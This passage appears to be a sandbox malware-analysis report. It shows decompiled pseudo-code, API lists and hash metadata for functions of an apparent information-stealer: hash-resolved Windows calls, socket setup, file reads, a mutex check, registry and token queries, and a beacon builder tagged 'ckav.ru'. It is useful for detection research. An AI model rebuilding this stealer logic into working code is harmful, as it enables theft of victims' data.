                                      			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                                      0x00404e1d
                                      0x00404e26
                                      0x00404e2a
                                      0x00404e2f
                                      0x00404e37
                                      0x00404e3a
                                      0x00404e45
                                      0x00404e4f
                                      0x00404e57
                                      0x00404e61
                                      0x00404e66
                                      0x00404e68
                                      0x00404e6c
                                      0x00404e6e
                                      0x00404e7a
                                      0x00404e80
                                      0x00404e84
                                      0x00404e9f
                                      0x00404ea7
                                      0x00404eab
                                      0x00404eb1
                                      0x00404eb1
                                      0x00404eb6
                                      0x00404ebe
                                      0x00404ecb
                                      0x00000000
                                      0x00404ec0
                                      0x00404ec1
                                      0x00404ec7
                                      0x00404ec7
                                      0x00404ecd
                                      0x00000000
                                      0x00404ece
                                      0x00404ebe
                                      0x00404e87
                                      0x00404e90
                                      0x00000000
                                      0x00404e90
                                      0x00000000

                                      APIs
                                      • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                      • socket.WS2_32(?,?,?), ref: 00404E7A
                                      • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: freeaddrinfogetaddrinfosocket
                                      • String ID:
                                      • API String ID: 2479546573-0
                                      • Opcode ID: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                                      • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                      • Opcode Fuzzy Hash: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                                      • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                                      0x004040c4
                                      0x004040ce
                                      0x004040d0
                                      0x004040e8
                                      0x004040ea
                                      0x004040ec
                                      0x004040f2
                                      0x0040418d
                                      0x00404190
                                      0x00404184
                                      0x00000000
                                      0x00404184
                                      0x004041a0
                                      0x004041a5
                                      0x004041a7
                                      0x00000000
                                      0x00000000
                                      0x004041a9
                                      0x004041b6
                                      0x004041b8
                                      0x004041be
                                      0x004041cb
                                      0x004041d0
                                      0x004041d1
                                      0x004041d3
                                      0x004041d8
                                      0x004041dc
                                      0x00000000
                                      0x004041e2
                                      0x00404100
                                      0x0040410c
                                      0x00404111
                                      0x0040417a
                                      0x0040417a
                                      0x00000000
                                      0x0040411b
                                      0x0040411b
                                      0x00404120
                                      0x00404122
                                      0x00404122
                                      0x0040412c
                                      0x0040413a
                                      0x0040413c
                                      0x00404140
                                      0x00000000
                                      0x00404142
                                      0x0040414a
                                      0x00404155
                                      0x0040415a
                                      0x0040415e
                                      0x00404168
                                      0x00404174
                                      0x00404176
                                      0x00404176
                                      0x0040417d
                                      0x0040417e
                                      0x00000000
                                      0x00404183
                                      0x00404140

                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: File$AllocCreateReadVirtual
                                      • String ID: .tmp
                                      • API String ID: 3585551309-2986845003
                                      • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                      • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                      • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                                      • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413866, Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E00413866(void* __eflags) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* __ebx;
				void* __edi;
				void* _t38;
				short _t43;
				short _t44;
				short _t45;
				short _t46;
				short _t47;
				short _t48;
				short _t50;
				short _t51;
				short _t52;
				short _t54;
				short _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t63;
				WCHAR* _t65;
				long _t68;
				void* _t75;
				short _t76;
				short _t78;
				short _t83;
				short _t84;
				short _t85;

				E00402C6C(_t38);
				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
				SetErrorMode(3); // executed
				_t43 = 0x4f;
				_v76 = _t43;
				_t44 = 0x4c;
				_v74 = _t44;
				_t45 = 0x45;
				_v72 = _t45;
				_t46 = 0x41;
				_v70 = _t46;
				_t47 = 0x55;
				_v68 = _t47;
				_t48 = 0x54;
				_t76 = 0x33;
				_t84 = 0x32;
				_t83 = 0x2e;
				_t78 = 0x64;
				_t85 = 0x6c;
				_v66 = _t48;
				_v52 = 0;
				_t50 = 0x77;
				_v48 = _t50;
				_t51 = 0x73;
				_v46 = _t51;
				_t52 = 0x5f;
				_v42 = _t52;
				_v28 = 0;
				_t54 = 0x6f;
				_v24 = _t54;
				_t55 = 0x65;
				_v20 = _t55;
				_v64 = _t76;
				_v62 = _t84;
				_v60 = _t83;
				_v58 = _t78;
				_v56 = _t85;
				_v54 = _t85;
				_v44 = _t84;
				_v40 = _t76;
				_v38 = _t84;
				_v36 = _t83;
				_v34 = _t78;
				_v32 = _t85;
				_v30 = _t85;
				_v22 = _t85;
				_v18 = _t76;
				_v16 = _t84;
				_v14 = _t83;
				_v12 = _t78;
				_v10 = _t85;
				_v8 = _t85;
				_v6 = 0;
				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t57( &_v76);
				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				 *_t59( &_v48);
				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
				_t81 =  &_v24;
				 *_t61( &_v24); // executed
				_t63 = E00414059(); // executed
				if(_t63 != 0) {
					_t65 = E00413D97(0);
					E004031E5(0, 0, 0xcf167df4, 0, 0);
					CreateMutexW(0, 1, _t65); // executed
					_t68 = GetLastError();
					_t92 = _t68 - 0xb7;
					if(_t68 == 0xb7) {
						E00413B81(0);
						_pop(_t81); // executed
					}
					E00413003(_t92); // executed
					E00412B2E(_t92); // executed
					E00412D31(_t81, _t84); // executed
					E00413B3F();
					E00413B81(0);
					 *0x49fdd0 = 1;
				}
				return 0;
			}































































                                      0x0041386f
                                      0x0041387e
                                      0x00413885
                                      0x00413889
                                      0x0041388c
                                      0x00413890
                                      0x00413893
                                      0x00413897
                                      0x0041389a
                                      0x0041389e
                                      0x004138a1
                                      0x004138a5
                                      0x004138a8
                                      0x004138ac
                                      0x004138af
                                      0x004138b2
                                      0x004138b5
                                      0x004138b8
                                      0x004138bb
                                      0x004138bc
                                      0x004138c4
                                      0x004138c8
                                      0x004138cb
                                      0x004138cf
                                      0x004138d2
                                      0x004138d6
                                      0x004138d7
                                      0x004138df
                                      0x004138e3
                                      0x004138e4
                                      0x004138ea
                                      0x004138eb
                                      0x004138f1
                                      0x004138f5
                                      0x004138f9
                                      0x004138fd
                                      0x00413901
                                      0x00413905
                                      0x00413909
                                      0x0041390d
                                      0x00413911
                                      0x00413915
                                      0x00413919
                                      0x0041391d
                                      0x00413921
                                      0x00413925
                                      0x00413929
                                      0x0041392d
                                      0x00413931
                                      0x00413935
                                      0x00413939
                                      0x0041393d
                                      0x00413941
                                      0x00413950
                                      0x00413959
                                      0x0041395f
                                      0x00413968
                                      0x0041396e
                                      0x00413973
                                      0x00413977
                                      0x00413979
                                      0x00413980
                                      0x00413982
                                      0x00413991
                                      0x0041399c
                                      0x0041399e
                                      0x004139a4
                                      0x004139a9
                                      0x004139ac
                                      0x004139b1
                                      0x004139b1
                                      0x004139b2
                                      0x004139b7
                                      0x004139bc
                                      0x004139c1
                                      0x004139c7
                                      0x004139cd
                                      0x004139cd
                                      0x004139db

                                      APIs
                                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                      • GetLastError.KERNEL32 ref: 0041399E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Error$CreateLastModeMutex
                                      • String ID:
                                      • API String ID: 3448925889-0
                                      • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                      • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004042CF, Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v8;
				void* _t7;
				long _t10;
				void* _t21;
				struct _OVERLAPPED* _t24;

				_t14 = __ebx;
				_t24 = 0;
				_v8 = 0;
				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
				_t21 = _t7;
				if(_t21 != 0xffffffff) {
					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
					if(_t10 != 0xffffffff) {
						E004031E5(_t14, 0, 0xc148f916, 0, 0);
						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
						_t24 =  !=  ? 1 : 0;
					}
					E00403C40(_t21); // executed
				}
				return _t24;
			}








                                      0x004042cf
                                      0x004042d5
                                      0x004042df
                                      0x004042e2
                                      0x004042f9
                                      0x004042fb
                                      0x00404300
                                      0x0040430a
                                      0x00404314
                                      0x00404319
                                      0x00404323
                                      0x00404334
                                      0x0040433b
                                      0x0040433b
                                      0x0040433f
                                      0x00404344
                                      0x0040434c

                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                      • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreatePointerWrite
                                      • String ID:
                                      • API String ID: 3672724799-0
                                      • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                      • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                      • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                      • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00412D31, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 34%
                                      			E00412D31(void* __ecx, void* __edi) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v40;
				void* __ebx;
				intOrPtr* _t10;
				void* _t11;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;
				void* _t53;
				char* _t57;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t53 = __ecx;
				_t10 =  *0x49fde0;
				_t68 = _t67 - 0x24;
				 *0x49fddc = 0x927c0;
				 *0x49fde4 = 0;
				_t75 = _t10;
				if(_t10 != 0) {
					L16:
					_push(1);
					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
					_t61 = _t11;
					_t68 = _t68 + 0xc;
					if(_t61 != 0) {
						E004031E5(0, 0, 0xfcae4162, 0, 0);
						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
					}
					L004067C4(0xea60); // executed
					_pop(_t53);
				} else {
					_push(__edi);
					 *0x49fde0 = E004056BF(0x2bc);
					E00413DB7(_t53, _t75,  &_v40);
					_t57 =  &_v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E004058D4( *0x49fde0, 0x12);
					E004058D4( *0x49fde0, 0x28);
					E00405872( *0x49fde0, "ckav.ru", 0, 0);
					_t69 = _t68 + 0x28;
					_t64 = E0040632F();
					_push(0);
					_push(1);
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						E00405872();
						_t70 = _t69 + 0x10;
					} else {
						_push(_t64);
						_push( *0x49fde0);
						E00405872();
						E00402BAB(_t64);
						_t70 = _t69 + 0x14;
					}
					_t58 = E00406130(_t57);
					_push(0);
					_push(1);
					_t77 = _t64;
					if(_t64 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t25 = E00405872();
						_t71 = _t70 + 0x10; // executed
					} else {
						_push(_t58);
						_push( *0x49fde0);
						E00405872();
						_t25 = E00402BAB(_t58);
						_t71 = _t70 + 0x14;
					}
					_t26 = E004061C3(_t25, 0, _t77); // executed
					_t65 = _t26;
					_push(0);
					_push(1);
					if(_t65 == 0) {
						_push(0);
						_push( *0x49fde0);
						_t27 = E00405872();
						_t72 = _t71 + 0x10;
					} else {
						_push(_t65);
						_push( *0x49fde0);
						E00405872();
						_t27 = E00402BAB(_t65);
						_t72 = _t71 + 0x14;
					}
					_t66 = E00406189(_t27);
					_t79 = _t66;
					if(_t66 == 0) {
						E00405781( *0x49fde0, 0);
						E00405781( *0x49fde0, 0);
						_t73 = _t72 + 0x10;
					} else {
						E00405781( *0x49fde0,  *_t66);
						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
						E00402BAB(_t66);
						_t73 = _t72 + 0x14;
					}
					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
					_t35 = E0040642C(_t79); // executed
					E004058D4( *0x49fde0, _t35);
					E004058D4( *0x49fde0, _v24);
					E004058D4( *0x49fde0, _v20);
					E004058D4( *0x49fde0, _v16);
					E004058D4( *0x49fde0, _v12);
					E00405872( *0x49fde0, E00413D97(0), 1, 0);
					_t68 = _t73 + 0x48;
				}
				_t80 =  *0x49fde4;
				if( *0x49fde4 == 0) {
					_t10 =  *0x49fde0;
					goto L16;
				}
				return E00405695(_t53,  *0x49fde0);
			}






























                                      0x00412d31
                                      0x00412d34
                                      0x00412d39
                                      0x00412d3c
                                      0x00412d49
                                      0x00412d50
                                      0x00412d52
                                      0x00412f24
                                      0x00412f24
                                      0x00412f2b
                                      0x00412f30
                                      0x00412f32
                                      0x00412f37
                                      0x00412f41
                                      0x00412f53
                                      0x00412f53
                                      0x00412f5b
                                      0x00412f60
                                      0x00412d58
                                      0x00412d58
                                      0x00412d63
                                      0x00412d6c
                                      0x00412d73
                                      0x00412d7e
                                      0x00412d7f
                                      0x00412d80
                                      0x00412d81
                                      0x00412d82
                                      0x00412d8f
                                      0x00412da1
                                      0x00412da6
                                      0x00412dae
                                      0x00412db0
                                      0x00412db1
                                      0x00412db5
                                      0x00412dce
                                      0x00412dcf
                                      0x00412dd5
                                      0x00412dda
                                      0x00412db7
                                      0x00412db7
                                      0x00412db8
                                      0x00412dbe
                                      0x00412dc4
                                      0x00412dc9
                                      0x00412dc9
                                      0x00412de2
                                      0x00412de4
                                      0x00412de5
                                      0x00412de7
                                      0x00412de9
                                      0x00412e02
                                      0x00412e03
                                      0x00412e09
                                      0x00412e0e
                                      0x00412deb
                                      0x00412deb
                                      0x00412dec
                                      0x00412df2
                                      0x00412df8
                                      0x00412dfd
                                      0x00412dfd
                                      0x00412e11
                                      0x00412e17
                                      0x00412e19
                                      0x00412e1a
                                      0x00412e1e
                                      0x00412e37
                                      0x00412e38
                                      0x00412e3e
                                      0x00412e43
                                      0x00412e20
                                      0x00412e20
                                      0x00412e21
                                      0x00412e27
                                      0x00412e2d
                                      0x00412e32
                                      0x00412e32
                                      0x00412e4b
                                      0x00412e4d
                                      0x00412e4f
                                      0x00412e7e
                                      0x00412e8a
                                      0x00412e8f
                                      0x00412e51
                                      0x00412e59
                                      0x00412e67
                                      0x00412e6d
                                      0x00412e72
                                      0x00412e72
                                      0x00412e9e
                                      0x00412eaf
                                      0x00412eb4
                                      0x00412ec0
                                      0x00412ece
                                      0x00412edc
                                      0x00412eea
                                      0x00412ef8
                                      0x00412f0f
                                      0x00412f14
                                      0x00412f14
                                      0x00412f17
                                      0x00412f1d
                                      0x00412f1f
                                      0x00000000
                                      0x00412f1f
                                      0x00412f74

                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                        • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                        • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$CreateFreeProcessThread_wmemset
                                      • String ID: ckav.ru
                                      • API String ID: 2915393847-2696028687
                                      • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                      • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                      • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                      • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040632F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040632F() {
				char _v8;
				void* _t4;
				void* _t7;
				void* _t16;

				_t16 = E00402B7C(0x208);
				if(_t16 == 0) {
					L4:
					_t4 = 0;
				} else {
					E0040338C(_t16, 0, 0x104);
					_t1 =  &_v8; // 0x4143e8
					_v8 = 0x208;
					_t7 = E00406069(_t16, _t1); // executed
					if(_t7 == 0) {
						E00402BAB(_t16);
						goto L4;
					} else {
						_t4 = _t16;
					}
				}
				return _t4;
			}







                                      0x00406340
                                      0x00406345
                                      0x00406373
                                      0x00406373
                                      0x00406347
                                      0x0040634f
                                      0x00406354
                                      0x00406357
                                      0x0040635c
                                      0x00406366
                                      0x0040636d
                                      0x00000000
                                      0x00406368
                                      0x00406368
                                      0x00406368
                                      0x00406366
                                      0x0040637a

                                      APIs
                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      • _wmemset.LIBCMT ref: 0040634F
                                        • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser_wmemset
                                      • String ID: CA
                                      • API String ID: 2078537776-1052703068
                                      • Opcode ID: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                                      • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                      • Opcode Fuzzy Hash: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                                      • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                                      0x00406094
                                      0x004060a8
                                      0x004060ab

                                      APIs
                                      • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: InformationToken
                                      • String ID: IDA
                                      • API String ID: 4114910276-365204570
                                      • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                      • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                      • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                      • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                                      0x00402c10
                                      0x00402c15
                                      0x00402c1b
                                      0x00402c1e

                                      APIs
                                      • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID: s1@
                                      • API String ID: 190572456-427247929
                                      • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                      • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                      • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                      • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
